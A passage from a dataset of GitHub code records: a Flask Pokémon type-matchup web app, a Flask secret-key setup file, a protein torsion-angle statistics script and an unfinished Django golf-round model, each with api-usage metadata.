"attribute"}, {"api_name": "libs.scene_graph", "line_number": 158, "usage_type": "name"}, {"api_name": "libs.basic_shapes.createMinecraftCube", "line_number": 180, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 180, "usage_type": "name"}, {"api_name": "libs.easy_shaders.GPUShape", "line_number": 181, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 181, "usage_type": "name"}, {"api_name": "libs.easy_shaders.textureSimpleSetup", "line_number": 184, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 184, "usage_type": "name"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 185, "usage_type": "call"}, {"api_name": "libs.gpu_shape.createGPUShape", "line_number": 187, "usage_type": "call"}, {"api_name": "libs.obj_handler.read_OBJ2", "line_number": 187, "usage_type": "call"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 187, "usage_type": "call"}, {"api_name": "libs.easy_shaders.textureSimpleSetup", "line_number": 188, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 188, "usage_type": "name"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 188, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 192, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 192, "usage_type": "name"}, {"api_name": "libs.transformations.uniformScale", "line_number": 193, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 193, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 196, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 196, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 197, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 197, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 200, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 200, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 201, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 201, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 204, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 204, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 205, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 205, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 208, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 208, "usage_type": "name"}, {"api_name": "libs.transformations.uniformScale", "line_number": 209, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 209, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 212, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 212, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 213, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 213, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 213, "usage_type": "call"}, {"api_name": "libs.transformations.scale", "line_number": 213, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 216, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 216, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 217, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 217, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 217, "usage_type": "call"}, {"api_name": "libs.transformations.scale", "line_number": 217, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 220, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 220, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 178, "usage_type": "attribute"}, {"api_name": "libs.scene_graph", "line_number": 178, "usage_type": "name"}, {"api_name": "pyglet.window", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 241, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 243, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 244, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 245, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 247, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 248, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 249, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findTransform", "line_number": 250, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 250, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 251, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 251, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 251, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 266, "usage_type": "call"}, {"api_name": "libs.curves.hermiteMatrix", "line_number": 267, "usage_type": "call"}, {"api_name": "libs.curves", "line_number": 267, "usage_type": "name"}, {"api_name": "libs.curves.evalCurve", "line_number": 268, "usage_type": "call"}, {"api_name": "libs.curves", "line_number": 268, "usage_type": "name"}, {"api_name": "ship.route", "line_number": 272, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 276, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 276, "usage_type": "call"}, {"api_name": "pyglet.window", "line_number": 278, "usage_type": "attribute"}, {"api_name": "ship.start_route", "line_number": 282, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 283, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 285, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 290, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 291, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 292, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 294, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 295, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 296, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 298, "usage_type": "attribute"}, {"api_name": "ship.rotationzlocal", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 300, "usage_type": "attribute"}, {"api_name": "ship.rotationzlocal", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 302, "usage_type": "attribute"}, {"api_name": "ship.start_route", "line_number": 303, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 304, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 309, "usage_type": "attribute"}, {"api_name": "ship.altitude", "line_number": 311, "usage_type": "attribute"}, {"api_name": "ship.altitude", "line_number": 313, "usage_type": "attribute"}, {"api_name": "ship.altitude", "line_number": 315, "usage_type": "attribute"}, {"api_name": "libs.gpu_shape.createGPUShape", "line_number": 321, "usage_type": "call"}, {"api_name": "libs.basic_shapes.createAxis", "line_number": 321, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 321, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 325, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 325, "usage_type": "name"}, {"api_name": "libs.transformations.rotationY", "line_number": 325, "usage_type": "call"}, {"api_name": "ship.rotationylocal", "line_number": 325, "usage_type": "attribute"}, {"api_name": "libs.transformations.translate", "line_number": 325, "usage_type": "call"}, {"api_name": "ship.altitude", "line_number": 325, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 325, "usage_type": "attribute"}, {"api_name": "ship.x", "line_number": 326, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findPosition", "line_number": 326, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 326, "usage_type": "name"}, {"api_name": "ship.y", "line_number": 327, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findPosition", "line_number": 327, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 327, "usage_type": "name"}, {"api_name": "ship.z", "line_number": 328, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findPosition", "line_number": 328, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 328, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 329, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 329, "usage_type": "name"}, {"api_name": "libs.transformations.rotationY", "line_number": 329, "usage_type": "call"}, {"api_name": "ship.rotationylocal", "line_number": 329, "usage_type": "attribute"}, {"api_name": "libs.transformations.translate", "line_number": 329, "usage_type": "call"}, {"api_name": "ship.velocity", "line_number": 329, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 331, "usage_type": "attribute"}, {"api_name": "ship.x", "line_number": 332, "usage_type": "attribute"}, {"api_name": "ship.x", "line_number": 333, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 334, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 335, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 342, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 343, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 344, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 345, "usage_type": "attribute"}, {"api_name": "ship.start_route", "line_number": 348, "usage_type": "attribute"}, {"api_name": "libs.transformations.matmul", "line_number": 349, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 349, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 350, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 350, "usage_type": "name"}, {"api_name": "ship.route", "line_number": 350, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 351, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 352, "usage_type": "attribute"}, {"api_name": "libs.transformations.rotationY", "line_number": 352, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 352, "usage_type": "name"}, {"api_name": "ship.linex", "line_number": 355, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 355, "usage_type": "attribute"}, {"api_name": "ship.liney", "line_number": 356, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 356, "usage_type": "attribute"}, {"api_name": "ship.linez", "line_number": 357, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 357, "usage_type": "attribute"}, {"api_name": "libs.transformations.lookAt", "line_number": 365, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 365, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 372, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 372, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 373, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 373, "usage_type": "name"}, {"api_name": "libs.transformations.uniformScale", "line_number": 374, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 374, "usage_type": "name"}, {"api_name": "libs.transformations.identity", "line_number": 384, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 384, "usage_type": "name"}, {"api_name": "ship.route", "line_number": 389, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 390, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 392, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 393, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 395, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 402, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 402, "usage_type": "name"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 403, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 403, "usage_type": "name"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 404, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 404, "usage_type": "name"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 405, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 405, "usage_type": "name"}, {"api_name": "pyglet.clock.schedule_interval", "line_number": 408, "usage_type": "call"}, {"api_name": "pyglet.clock", "line_number": 408, "usage_type": "attribute"}, {"api_name": "pyglet.app.run", "line_number": 409, "usage_type": "call"}, {"api_name": "pyglet.app", "line_number": 409, "usage_type": "attribute"}]}
+{"seq_id": "26706102884", "text": "import pandas as pd\nfrom flask import Flask, render_template, request, redirect, url_for, session\nfrom sqlalchemy import create_engine\nimport json\nimport os\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = os.urandom(12).hex()\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///pkmn.sqlite\")\n\ntype_df = pd.read_sql(\"SELECT * FROM typemult\", con = engine, index_col=\"type\")\n\ntype_list = list(type_df.index)\n\nname_df = pd.read_sql(\"SELECT name, type_1, type_2 FROM pkmn_name_type\", con = engine, index_col=\"name\")\nname_df.drop(\"Drop\", inplace=True)\n\n# core function for deciding what to attack with\ndef attack_with(type1, type2=None):\n\n #monotype \n if type2 == None:\n damage = type_df[type1]\n damage = damage[damage != 1].sort_values(ascending=False)\n damage = pd.DataFrame(damage).rename(columns={type1: \"Defense Multiplier\"})\n damage['Type'] = [hit_type.title() for hit_type in damage.index]\n damage = damage[['Type', 'Defense Multiplier']]\n return damage\n #dual type\n else:\n damage = type_df[type1] * type_df[type2]\n damage = damage[damage != 1].sort_values(ascending=False)\n damage = pd.DataFrame(damage, columns = [\"Defense Multiplier\"])\n damage['Type'] = [hit_type.title() for hit_type in damage.index]\n damage = damage[['Type', 'Defense Multiplier']]\n return damage\n\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/type\", methods = ['POST', 'GET'])\ndef type_input():\n if request.method == \"POST\":\n \n # try clearing out previous variables in the session\n try:\n session.pop('send')\n except:\n pass\n\n # look for the monotype indicator, return a single type answer\n if request.form.get == \"on\":\n type1 = request.form.get(\"type_1_input\")\n def_mult_table = attack_with(type1).to_html(index = False, classes=['table table-striped'])\n send = {\n \"type1\": type1,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n # dual type answer\n else:\n type1 = request.form.get(\"type_1_input\")\n type2 = request.form.get(\"type_2_input\")\n\n # catch the error of people inputting the same type twice\n if type1 == type2:\n send = {\n \"error\": 'Same type input twice. Did you mean to check \"Monotype\"?',\n \"source\": \"/type\"\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"oops\"))\n else:\n def_mult_table = attack_with(type1, type2).to_html(index = False, classes=['table table-striped'])\n send = {\n \"type1\": type1,\n \"type2\": type2,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n else:\n return render_template(\"type.html\", type_list=type_list)\n\n\n\n@app.route(\"/name\", methods=[\"POST\", \"GET\"])\ndef name_input():\n try:\n if request.method == \"POST\":\n # try clearing out previous variables in the session\n try:\n session.pop('send')\n except:\n pass\n\n pkmn=request.form.get(\"poke_name\")\n \n # see if the pokemon is dual type\n if name_df.loc[pkmn][1]:\n type1=name_df.loc[pkmn][0]\n type2=name_df.loc[pkmn][1]\n def_mult_table = attack_with(type1, type2).to_html(index = False, classes=['table table-striped'])\n send = {\n \"pkmn\": pkmn,\n \"type1\": type1,\n \"type2\": type2,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n # monotype\n else:\n type1=name_df.loc[pkmn][0]\n def_mult_table = attack_with(type1).to_html(index = False, classes=['table table-striped'])\n send = {\n \"pkmn\": pkmn,\n \"type1\": type1,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n # render base page with names as a list for autofill\n else:\n name_list = list(name_df.index)\n return render_template(\"name.html\", name_list = name_list)\n # catch the error of inputting a pokemon not in the list\n except:\n send = {\n \"error\": \"I don't know that Pokémon yet, sorry.\",\n \"source\": \"/name\"\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"oops\"))\n\n@app.route(\"/oops\")\ndef oops():\n received = session['send']\n return render_template(\"oops.html\", received = json.loads(received))\n\n\n@app.route(\"/calc\")\ndef calc():\n received = session['send']\n return render_template(\"calc.html\", received=json.loads(received))\n\n#################################################\n# Running App\n#################################################\n\nif __name__ == \"__main__\":\n app.run()", "repo_name": "rgoldsberry/pokemon-types", "sub_path": "web_app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 71, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 93, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 123, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 134, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 146, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 151, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 152, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 158, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}]}
+{"seq_id": "9330214484", "text": "#!/usr/bin/env python3\n\nimport os\n\nfrom flask import Flask\n\nfrom core.controllers.login import controller as login\n\n\ndef keymaker(omnibus, filename='secret_key'):\n pathname = os.path.join(omnibus.instance_path, filename)\n print(\"Pathname\", pathname)\n try:\n omnibus.config['SECRET_KEY'] = open(pathname, 'rb').read()\n except IOError:\n parent_directory = os.path.dirname(pathname)\n if not os.path.isdir(parent_directory):\n os.system('mkdir -p {0}'.format(parent_directory))\n os.system('head -c 24 /dev/urandom > {0}'.format(pathname))\n omnibus.config['SECRET_KEY'] = open(pathname, filename)\n\n\nomnibus = Flask(__name__)\n\nomnibus.register_blueprint(login)\n\nkeymaker(omnibus)\n", "repo_name": "MikeBloom914/amazon", "sub_path": "run/core/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 18, "usage_type": "call"}, {"api_name": "os.system", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 23, "usage_type": "call"}, {"api_name": "core.controllers.login.controller", "line_number": 25, "usage_type": "argument"}]}
+{"seq_id": "43354520868", "text": "import os\nimport argparse\nimport pathlib\nimport numpy as np\nfrom Bio.PDB import PDBParser\nfrom idpgan_ped.coords import calc_chain_dihedrals\n\n\nparser = argparse.ArgumentParser(\n description='Build a file with values of a C-alpha torsional angles'\n ' for disordered protein structures.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('-i', '--pdb_dp', type=str, required=True,\n help='Input directory with a set of AlphaFold structures.')\nparser.add_argument('-p', '--pred_fp', type=str, required=True,\n help='Output file from the alphafold_disorder.py script from the'\n ' AlphaFold-disorder GitHub repository. The script must have been'\n ' use on the directory specified using the -i argument of this'\n ' script.')\nparser.add_argument('-o', '--out_fp', type=str, required=True,\n help='Output file.')\nparser.add_argument('-t', '--idr_score_t', type=float, default=0.581,\n help='Threshold score for defining an IDR residue. Obtained from:'\n ' https://pubmed.ncbi.nlm.nih.gov/36210722/')\n\n# parser.add_argument('--foo', action='store_true')\nargs = parser.parse_args()\n\n\n# Amino acids.\naa_three_to_one_dict = {\n \"GLY\": \"G\", \"ALA\": \"A\", \"LEU\": \"L\", \"ILE\": \"I\", \"ARG\": \"R\", \"LYS\": \"K\",\n \"MET\": \"M\", \"CYS\": \"C\", \"TYR\": \"Y\", \"THR\": \"T\", \"PRO\": \"P\", \"SER\": \"S\",\n \"TRP\": \"W\", \"ASP\": \"D\", \"GLU\": \"E\", \"ASN\": \"N\", \"GLN\": \"Q\", \"PHE\": \"F\",\n \"HIS\": \"H\", \"VAL\": \"V\", \"UNK\": \"X\"\n}\n\naa_one_letter = tuple(\"QWERTYIPASDFGHKLCVNMX\")\n\n\n# Parse the output file of the 'alphafold_disorder.py' script.\nprint(f\"# Reading the output of AlphaFold-disorder at: {args.pred_fp}\")\nidr_data = {}\ntot_residues = 0\nwith open(args.pred_fp, \"r\") as i_fh:\n i_fh.readline() # Exclude the first line.\n for line in i_fh:\n fields = line.split()\n filename = fields[0]\n res_num = int(fields[1])\n idr_score = float(fields[7])\n tot_residues += 1\n # Found an residue predicted to be in a IDR.\n if idr_score < args.idr_score_t:\n continue\n if filename not in idr_data:\n idr_data[filename] = [(res_num, idr_score)]\n else:\n idr_data[filename].append((res_num, idr_score))\nprint(f\"- Found {len(idr_data)} models with IDR residues and\"\n f\" {sum([len(idr_data[k]) for k in idr_data])} IDR residues\"\n f\" (out of {tot_residues} total residues).\")\n\n\n# Collect statistics for each PDB file.\nprint(\"# Extracting torsion angle values from PDB files.\")\ntor_values = []\nfor k, filename in enumerate(sorted(idr_data.keys())):\n idr_residues = idr_data[filename]\n print(f\"* {filename} {k}/{len(idr_data)}\")\n\n pdb_fp = os.path.join(args.pdb_dp, filename + \".pdb\")\n structure = PDBParser(QUIET=True).get_structure(filename, pdb_fp)\n residues = list(structure.get_residues())\n print(f\"- n_idr_res={len(idr_residues)}, n_tot_res={len(residues)}\")\n\n xyz_ca = [res[\"CA\"].get_coord() for res in residues]\n xyz_ca = np.stack(xyz_ca)[None,...]\n tor_ca = calc_chain_dihedrals(xyz_ca)\n for idr_res_i in idr_residues:\n if idr_res_i[0] == 1: # The first residue of a chain can't be used.\n continue \n if idr_res_i[0] >= len(residues) - 1: # Last two residues can't be used.\n continue\n tor_id = idr_res_i[0]-2\n res_im1 = residues[idr_res_i[0]-1-1]\n res_i = residues[idr_res_i[0]-1]\n res_ip1 = residues[idr_res_i[0]-1+1]\n res_ip2 = residues[idr_res_i[0]-1+2]\n tor_values.append([\n # Torsion angle value.\n tor_ca[0, tor_id],\n # Amino acid type indices.\n aa_one_letter.index(aa_three_to_one_dict[res_im1.get_resname()]),\n aa_one_letter.index(aa_three_to_one_dict[res_i.get_resname()]),\n aa_one_letter.index(aa_three_to_one_dict[res_ip1.get_resname()]),\n aa_one_letter.index(aa_three_to_one_dict[res_ip2.get_resname()])\n ])\n\ntor_values = np.array(tor_values)\nprint(f\"\\n# Collected {tor_values.shape[0]} torsion angle values.\")\nprint(f\"- Saving values at {args.out_fp}.\")\nnp.save(args.out_fp, tor_values)", "repo_name": "feiglab/idpgan_ped", "sub_path": "scripts/torsion_potential/torsion_potential_stats.py", "file_name": "torsion_potential_stats.py", "file_ext": "py", "file_size_in_byte": 4133, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "Bio.PDB.PDBParser", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 78, "usage_type": "call"}, {"api_name": "idpgan_ped.coords.calc_chain_dihedrals", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 103, "usage_type": "call"}]}
+{"seq_id": "23937105660", "text": "from django.db import models\nimport datetime\n# Create your models here.\n\nNINE = 9\nEIGHTEEN = 18\nMINOR = 5\nADULT = 8\nSENIOR = 7\nCARTP = 15\nGOLF_BALLS = 2\nCLUBS = 7\n\nclass golfer(models.Model):\n\n fname = models.CharField(max_length= 10)\n lname = models.CharField(max_length= 15)\n phone = models.CharField(max_length= 13)\n age = models.IntegerField(max_length= 3)\n\n def __str__ (self):\n return \"( \" + self.fname + \" \" + self.lname + \" )\" + self.phone + \", \" + self.age\n\nclass options(models.Model):\n\n occurance = models.ForeignKey(round, on_delete=models.CASCADE)\n phone = models.ForeignKey(round, on_delete=models.CASCADE)\n cart = models.IntegerField(maximum = 2, default = 0)\n golf_balls = models.IntegerField(default=0)\n club_rentals = models.IntegerField(default=0)\n \n\n \nclass round(models.Model):\n\n occurance = models.DateTimeField(default = datetime.datetime.now)\n phone = models.ForeignKey(golfer, on_delete=models.CASCADE)\n holes = models.IntegerField(max_length= 2, \n choices=[NINE, EIGHTEEN], default = 9)\n mem = models.IntegerField(default = None)\n price = models.FloatField(default = 0.0)\n \n def cal_price(self):\n curr = 0.0\n\n if(self.holes == NINE):\n if self.golfer.age < 18:\n curr += 5\n elif self.golfer.age > 18 & self.golfer.age < 65:\n curr += 8\n elif self.golfer.age > 65:\n curr += 7\n\n if self.round.mem < 18:\n curr += 5\n elif self.round.mem > 18 & self.round.mem < 65:\n curr += 8\n elif self.round.mem > 65:\n curr += 7\n\n elif self.round.holes == 18:\n if self.golfer.age < 18:\n curr += 10\n elif self.golfer.age > 18 & self.golfer.age < 65:\n curr += 16\n elif self.golfer.age > 65:\n curr += 14\n\n if self.round.mem < 18:\n curr += 10\n elif self.round.mem > 18 & self.round.mem < 65:\n curr += 16\n elif self.round.mem > 65:\n curr += 14\n\n curr += self.golf_balls * 